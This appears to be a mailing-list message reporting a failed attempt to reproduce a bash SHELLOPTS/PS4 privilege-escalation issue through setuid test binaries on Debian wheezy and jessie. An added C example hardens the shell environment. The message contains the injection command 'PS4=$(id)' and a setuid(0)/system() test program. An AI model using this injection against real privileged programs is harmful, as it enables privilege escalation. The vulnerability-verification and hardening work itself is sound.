Hi Matthias and Balint
I have tried to reproduce the problem described in the openwall email. However I can not reproduce it. Have you been able to?
On wheezy:
------------
ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
Thu Oct 6 20:54:07 UTC 2016
ola@tigereye:/$ ls -la test
-rwsr-xr-x 1 root root 6824 Oct 6 20:52 test
ola@tigereye:/$ dpkg -l bash
...CUT...
ii bash 4.2+dfsg-0.1 amd64 GNU Bourne Again SHell
On jessie:
ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
Thu Oct 6 22:48:35 CEST 2016
ola@tigereye:~/exploit$ dpkg -l bash
...CUT...
ii bash 4.3-11+b1 amd64 GNU Bourne Again SHell
I think it may be because SHELLOPTS is a read-only variable.
ola@tigereye:~/exploit$ SHELLOPTS=xtrace
bash: SHELLOPTS: readonly variable
Do you think I have made a mistake in the reproduction, or is it that the patch was actually not for a real problem (at least in Debian)?
Not even if I change the code like this:
ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0); system("/bin/bash -c /bin/date"); }'
ola@tigereye:~/exploit$ ./test2
Thu Oct 6 23:04:11 CEST 2016
ola@tigereye:~/exploit$ set -x
ola@tigereye:~/exploit$ ./test2
uid=1000(ola) gid=1000(ola) groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
Thu Oct 6 23:04:18 CEST 2016
My conclusion is that there is no security hole. But I may be mistaken.
Can anyone else reproduce the issue?
Best regards,
// Ola
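Added example, not part of Ola's message and not code from bash or Debian: the test programs above hand the caller's full environment (including SHELLOPTS and PS4) to the shell via system(). A privileged program that must spawn a shell can instead exec it with an allow-listed environment, so those variables never reach the child regardless of what bash does with them. The function and variable names (env_entry_allowed, build_safe_env, run_with_safe_env, allow) are my own, and the allow-list contents are an assumption chosen for illustration.

```c
/* Added example: run a shell command from a privileged program without
 * passing through the caller's environment. Names are hypothetical. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

extern char **environ;

/* Assumed allow-list: only these names survive into the child. SHELLOPTS,
 * PS4, BASH_ENV, ENV, IFS, LD_* and everything else are dropped. */
static const char *const allow[] = { "TERM", "LANG", "LC_ALL", NULL };

/* Return 1 if a "NAME=value" entry names an allow-listed variable. */
int env_entry_allowed(const char *entry) {
    const char *eq = strchr(entry, '=');
    if (!eq) return 0;
    size_t n = (size_t)(eq - entry);
    for (int i = 0; allow[i]; i++)
        if (strlen(allow[i]) == n && strncmp(allow[i], entry, n) == 0)
            return 1;
    return 0;
}

/* Build a NULL-terminated environment from `in`: a fixed PATH first, then
 * only allow-listed entries. Caller releases it with free_env(). */
char **build_safe_env(char *const *in) {
    size_t count = 0;
    for (size_t i = 0; in && in[i]; i++) count++;
    char **out = calloc(count + 2, sizeof *out);   /* PATH + entries + NULL */
    if (!out) return NULL;
    size_t k = 0;
    out[k++] = strdup("PATH=/usr/bin:/bin");
    for (size_t i = 0; in && in[i]; i++)
        if (env_entry_allowed(in[i]) && strncmp(in[i], "PATH=", 5) != 0)
            out[k++] = strdup(in[i]);
    out[k] = NULL;
    return out;
}

void free_env(char **env) {
    if (!env) return;
    for (size_t i = 0; env[i]; i++) free(env[i]);
    free(env);
}

/* Run `cmd` as "/bin/sh -c cmd" with the sanitized environment instead of
 * system(). Returns the child's exit status, or -1 on failure. */
int run_with_safe_env(const char *cmd) {
    char **env = build_safe_env(environ);
    if (!env) return -1;
    pid_t pid = fork();
    if (pid < 0) { free_env(env); return -1; }
    if (pid == 0) {
        char *argv[] = { "/bin/sh", "-c", (char *)cmd, NULL };
        execve("/bin/sh", argv, env);
        _exit(127);                     /* exec failed */
    }
    free_env(env);
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* No setuid() here; the point is the environment handling, which is
     * what matters once a program is installed setuid. */
    return run_with_safe_env("/bin/date");
}
```

Running it as `env -i SHELLOPTS=xtrace PS4='$(id)' ./safe` prints only the date, because the child never sees SHELLOPTS or PS4. This is a belt-and-braces measure on the calling side and does not depend on whether a given bash build drops those variables for privileged shells itself.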